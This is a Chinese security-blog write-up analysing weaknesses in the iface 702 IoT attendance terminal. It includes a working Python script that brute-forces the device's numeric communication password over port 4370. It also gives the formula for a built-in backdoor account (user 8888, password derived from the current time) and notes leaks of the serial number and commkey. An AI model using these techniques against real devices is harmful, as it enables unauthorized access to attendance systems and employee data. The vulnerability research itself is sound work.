freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

物联网设备iface702考勤机风险隐患分析记录
2024-11-19 12:51:05
所属地 北京

本次实验室是为了分析物联网设备iface 702考勤机是否存在网络安全风险。经过实验记录来看,该设备接口比较脆弱。

telent连接

Pasted Graphic 18.png

端口分析

Telnet进入后查看端口开放情况

发现8000端口

ip和端口.png

数据库分析

8000端口疑似时钟服务器内置地址
Pasted Graphic 29.png

获得设备信息

使用该IP,本地监听泄漏SN、commkey信息
Pasted Graphic 20.png

通讯密码爆破

Pasted Graphic 19.png

from zk import ZK, const
ip = '10.97.218.209'

conn = None
for i in range(0,10001):
    # print(i)
    try:
        zk = ZK(ip, port=4370, timeout=5, password=i, force_udp=False, ommit_ping=True)
        conn = zk.connect()
        print("Password Found --> ",i)
        break
    except Exception as e:
        print(i,e)
    finally:
        if conn:
            conn.disconnect()

管理软件连接

爆破获得通讯密码12(12是我修改过的密码,默认为0)
输入ip地址、端口:4370、通讯密码:12、机器号:1

Pasted Graphic 21.png

易被当作后门利用的账户

内置用户,用户名8888,密码(9999-当前时间)²
如:当前时间20点33就是 (9999-2033)² =63457156
注:1分钟内输入否则密码会变

获取当前账户密码

除了内置账户,我们可以通过接口测试,获得当前账户密码,通过ID和密码可以登陆账户

# 物联网安全 # IoT安全 # 安全隐患 # API接口 # 风险分析
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录